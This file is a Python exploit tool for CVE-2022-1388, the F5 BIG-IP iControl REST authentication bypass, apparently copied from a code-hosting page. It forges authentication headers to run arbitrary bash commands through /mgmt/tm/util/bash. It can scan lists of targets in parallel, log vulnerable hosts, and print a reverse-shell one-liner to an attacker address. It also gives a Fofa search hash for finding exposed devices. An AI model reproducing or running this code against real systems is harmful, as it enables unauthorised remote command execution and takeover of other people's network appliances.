/
CVE-2022-1388.py
125 lines (116 loc) · 4.92 KB
/
CVE-2022-1388.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
# -*- coding: utf-8 -*-
import argparse,pyfiglet,requests,threading,json
from concurrent.futures import ThreadPoolExecutor
requests.packages.urllib3.disable_warnings()
banner = pyfiglet.figlet_format("4pts Attack")
print(banner)
proxies={
'http':'127.0.0.1:11223',
'https':'127.0.0.1:11223'
}
R = threading.Lock()
def saveMessage(content,file):
global R
R.acquire()
fp = open(file,'a+', encoding='utf-8-sig')
fp.write(content+"\n")
fp.close()
R.release()
def headers1():
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36",
'Content-Type': 'application/json',
'Connection': 'Connection: close, X-F5-Auth-Token, X-Forwarded-For, Local-Ip-From-Httpd, X-F5-New-Authtok-Reqd, X-Forwarded-Server, X-Forwarded-Host',
'X-F5-Auth-Token': 'asdf',
'Authorization': 'Basic YWRtaW46aG9yaXpvbjM='
}
return headers
def headers2():
headers = {
"Accept-Encoding": "gzip, deflate",
"Accept": "*/*",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36",
'Content-Type': 'application/json',
'Connection': 'Connection: close, X-F5-Auth-Token, X-Forwarded-For, Local-Ip-From-Httpd, X-F5-New-Authtok-Reqd, X-Forwarded-Server, X-Forwarded-Host',
'X-F5-Auth-Token': '0',
'Authorization': 'Basic YWRtaW46'
}
return headers
def check(url):
try:
target_url = url + "/mgmt/shared/authn/login"
res = requests.get(target_url, verify=False, timeout=10,proxies=proxies)
if "resterrorresponse" in res.text:
print("[+] Host: "+url+" F5 iControl Rest API exposed ")
saveMessage(target_url,"poc.txt")
else:
print("[-] Host: "+url+" F5 not vulnerable ")
except Exception as e:
print("[x] Host: "+url+" Connection Fail ")
def attack(target_url, cmd):
attack_url = target_url + '/mgmt/tm/util/bash'
data = {"command": "run", "utilCmdArgs": "-c {0}".format(cmd)}
print(data)
try:
response = requests.post(url=attack_url, json=data, headers=headers2(),proxies=proxies, verify=False, timeout=5)
if response.status_code == 200 and 'commandResult' in response.text:
default = json.loads(response.text)
display = default['commandResult']
print("[+] Target {} Vulnerable".format(target_url))
print("suggested command for a reverse shell!: bash -i >&/dev/tcp/10.10.10.10/9999 0>&1")
print('[+] Response:{0}'.format(display))
else:
print("[-] Target {} Not Vulnerable".format(target_url))
except Exception as e:
print('url exception {0}'.format(target_url))
def PocExp(target_url):
attack_url = target_url + '/mgmt/tm/util/bash'
data = {"command": "run", "utilCmdArgs": "-c id"}
# data = {"command": "run", "utilCmdArgs": "-c {0}".format(cmd)}
# print(data)
try:
response = requests.post(url=attack_url, json=data, headers=headers1(),proxies=proxies, verify=False, timeout=10)
response2 = requests.post(url=attack_url, json=data, headers=headers2(),proxies=proxies, verify=False, timeout=10)
if (response.status_code == 200 and 'commandResult' in response.text) or (response2.status_code == 200 and 'commandResult' in response2.text):
default = json.loads(response.text)
display = default['commandResult']
print("[+] Target {} Vulnerable".format(target_url))
print("suggested command for a reverse shell!: bash -i >&/dev/tcp/10.10.10.10/9999 0>&1")
print('[+] Response:{0}'.format(display))
saveMessage(target_url,"success.txt")
else:
print("[-] Target {} Not Vulnerable".format(target_url))
except Exception as e:
print('url exception {0}'.format(target_url))
if __name__ == '__main__':
parse = argparse.ArgumentParser()
parse.add_argument("-u", "--url", help="Please CVE-2022-1388.py -u host")
parse.add_argument("-f", "--file", help="Please CVE-2022-1388.py -f file")
parse.add_argument("-c", "--command", default="id", help="Please CVE-2022-1388.py -f file")
args = parse.parse_args()
url = args.url
command = args.command
filepath = args.file
if url is not None and filepath is None and command is None:
check(url)
elif url is None and filepath is not None and command is None:
for x in open(filepath, "r").readlines():
pool = ThreadPoolExecutor(10)
pool.submit(check, x.strip())
elif command is not None and url is not None and filepath is None:
attack(url, command)
elif command is not None and url is None and filepath is not None:
for x in open(filepath, "r").readlines():
pool = ThreadPoolExecutor(10)
pool.submit(PocExp, x.strip())
else:
print('''
+-----------------------------------------------------------------+
Title: F5 BIG-IP iControl Rest API exposed Check
Fofa: icon_hash="-335242539"
Usage Single URL:python3 CVE-2022-1388.py -u url
Usage, List of URLS:python3 CVE-2022-1388.py -f url.txt
Usage, Exec:python3 CVE-2022-1388.py -u url -c command
Usage, ExecFile:python3 CVE-2022-1388.py -f url.txt -c id
+-----------------------------------------------------------------+
''')